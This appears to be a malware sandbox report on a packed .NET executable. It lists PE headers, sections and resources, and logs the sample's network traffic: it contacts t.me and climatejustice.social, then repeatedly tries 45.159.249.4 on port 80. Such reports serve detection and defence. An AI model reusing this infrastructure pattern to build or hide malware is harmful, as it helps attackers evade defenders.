                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x540000x848e.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x594000x24b0.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x5e0000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x528ec0x1c.text
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000x509940x50a00False0.9173994670542636data7.888541504684198IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0x540000x848e0x8600False0.285185401119403data5.202876902230195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0x5e0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0x541d80x468GLS_BINARY_LSB_FIRST
                                                                  RT_ICON0x546400x10a8data
                                                                  RT_ICON0x556e80x25a8data
                                                                  RT_ICON0x57c900x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0
                                                                  RT_GROUP_ICON0x5beb80x3edata
                                                                  RT_VERSION0x5bef80x3acdata
                                                                  RT_MANIFEST0x5c2a40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Network Behavior

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Aug 5, 2022 10:49:17.171144009 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.171211958 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.171312094 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.193044901 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.193099022 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.262348890 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.262528896 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.581129074 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.581168890 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.581739902 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.582654953 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.585340977 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.627368927 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.636874914 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.636929035 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.636996984 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.637042046 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.637079954 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.637162924 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.646790028 CEST49765443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:17.646811008 CEST44349765149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:17.822324038 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.822375059 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.822464943 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.823045969 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.823062897 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.881386042 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.881527901 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.889517069 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.889543056 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.889785051 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.889859915 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.891252995 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.931379080 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.989860058 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.989950895 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.989989042 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.990004063 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.990036011 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.990055084 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.990101099 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.990103006 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.990138054 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.990145922 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.990194082 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.990240097 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:17.990247965 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.990252018 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.990319014 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.990926981 CEST49766443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:17.990952015 CEST44349766167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:18.076406002 CEST4976780192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:49:21.101856947 CEST4976780192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:49:27.102472067 CEST4976780192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:49:39.262178898 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.262228966 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.262325048 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.262857914 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.262883902 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.320316076 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.320477009 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.323276997 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.323291063 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.327929020 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.327943087 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.388520956 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.388573885 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.388657093 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.388684988 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.388708115 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.388721943 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.388786077 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.392898083 CEST49768443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:49:39.392926931 CEST44349768149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:49:39.409035921 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.409100056 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.409226894 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.409776926 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.409800053 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.455121040 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.457098007 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.457684994 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.457705975 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.463613033 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.463638067 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.582288027 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.582314968 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.582376957 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.582446098 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.582518101 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.582587957 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.582602978 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.582655907 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.582688093 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.583306074 CEST49769443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:49:39.583337069 CEST44349769167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:49:39.600704908 CEST4977080192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:49:42.588087082 CEST4977080192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:49:48.588609934 CEST4977080192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:00.857614994 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:00.857666969 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:00.857789993 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:00.858506918 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:00.858522892 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:00.917665958 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:00.917768955 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:00.918248892 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:00.918258905 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:00.963068962 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:00.963099003 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:01.002574921 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:01.002677917 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:01.002718925 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:01.002734900 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:01.002758980 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:01.002769947 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:01.002790928 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:01.002810955 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:01.002818108 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:01.002854109 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:01.002885103 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:01.002928019 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:01.003129959 CEST49786443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:01.003148079 CEST44349786149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:01.016935110 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.017002106 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.017138004 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.017698050 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.017721891 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.065365076 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.065444946 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.065948963 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.065965891 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.080034018 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.080068111 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.231920004 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.231950998 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.232009888 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.232088089 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.232104063 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.232125998 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.232145071 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.232198954 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.242476940 CEST49787443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:01.242512941 CEST44349787167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:01.262342930 CEST4978880192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:04.355597973 CEST4978880192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:10.356084108 CEST4978880192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:22.499862909 CEST49801443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:22.499911070 CEST44349801149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:22.500017881 CEST49801443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:22.500943899 CEST49801443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:22.500965118 CEST44349801149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:22.559720039 CEST44349801149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:22.563486099 CEST49801443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:22.563986063 CEST49801443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:22.563997984 CEST44349801149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:22.568381071 CEST49801443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:22.568402052 CEST44349801149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:22.654177904 CEST44349801149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:22.654242992 CEST44349801149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:22.654376030 CEST44349801149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:22.654377937 CEST49801443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:22.654464960 CEST49801443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:22.655678988 CEST49801443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:22.655699015 CEST44349801149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:22.674810886 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.674860001 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.674976110 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.675597906 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.675628901 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.722220898 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.722506046 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.722961903 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.722980022 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.727132082 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.727150917 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.857398033 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.857456923 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.857494116 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.859236002 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.859266043 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.859282017 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.859389067 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.861351967 CEST49802443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:22.861370087 CEST44349802167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:22.876609087 CEST4980480192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:25.982403994 CEST4980480192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:31.998555899 CEST4980480192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:44.119946957 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.119992018 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.120143890 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.120920897 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.120933056 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.176810980 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.176940918 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.177670002 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.177689075 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.197926044 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.197945118 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244199038 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244241953 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244283915 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244322062 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244355917 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244373083 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244379997 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.244432926 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244473934 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244761944 CEST49854443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:50:44.244791985 CEST44349854149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:50:44.273916960 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.273956060 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.274086952 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.286598921 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.286621094 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.334139109 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.336725950 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.337399006 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.337408066 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.349813938 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.349834919 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463104010 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463155031 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463193893 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463303089 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463330984 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463371992 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463383913 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463409901 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463452101 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463455915 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.463490009 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.463535070 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.464889050 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.468607903 CEST49855443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:50:44.468637943 CEST44349855167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:50:44.493881941 CEST4985680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:47.499902010 CEST4985680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:50:53.516074896 CEST4985680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:51:05.645737886 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.645791054 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.645893097 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.646495104 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.646507025 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.702419043 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.707700014 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.708374023 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.708384991 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.713063955 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.713073969 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.776869059 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.776925087 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.776971102 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.777228117 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.777987003 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.778371096 CEST49883443192.168.2.7149.154.167.99
                                                                  Aug 5, 2022 10:51:05.778393030 CEST44349883149.154.167.99192.168.2.7
                                                                  Aug 5, 2022 10:51:05.799880028 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.799920082 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.800045013 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.800621986 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.800642967 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.844991922 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.859198093 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.865519047 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.865540028 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.871738911 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.871756077 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977401972 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977436066 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977457047 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977559090 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.977579117 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977623940 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.977632046 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:05.977642059 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.977696896 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.978152990 CEST49884443192.168.2.7167.86.107.75
                                                                  Aug 5, 2022 10:51:05.978167057 CEST44349884167.86.107.75192.168.2.7
                                                                  Aug 5, 2022 10:51:06.006800890 CEST4988680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:51:09.017041922 CEST4988680192.168.2.745.159.249.4
                                                                  Aug 5, 2022 10:51:15.017640114 CEST4988680192.168.2.745.159.249.4

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Aug 5, 2022 10:49:17.122176886 CEST6033553192.168.2.78.8.8.8
                                                                  Aug 5, 2022 10:49:17.141352892 CEST53603358.8.8.8192.168.2.7
                                                                  Aug 5, 2022 10:49:17.786555052 CEST6097853192.168.2.78.8.8.8
                                                                  Aug 5, 2022 10:49:17.805754900 CEST53609788.8.8.8192.168.2.7

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Aug 5, 2022 10:49:17.122176886 CEST192.168.2.78.8.8.80xc715Standard query (0)t.meA (IP address)IN (0x0001)
                                                                  Aug 5, 2022 10:49:17.786555052 CEST192.168.2.78.8.8.80xd64aStandard query (0)climatejustice.socialA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Aug 5, 2022 10:49:17.141352892 CEST8.8.8.8192.168.2.70xc715No error (0)t.me149.154.167.99A (IP address)IN (0x0001)
                                                                  Aug 5, 2022 10:49:17.805754900 CEST8.8.8.8192.168.2.70xd64aNo error (0)climatejustice.social167.86.107.75A (IP address)IN (0x0001)

                                                                  HTTP Request Dependency Graph

                                                                  • t.me
                                                                  • climatejustice.social

                                                                  HTTPS Proxied Packets

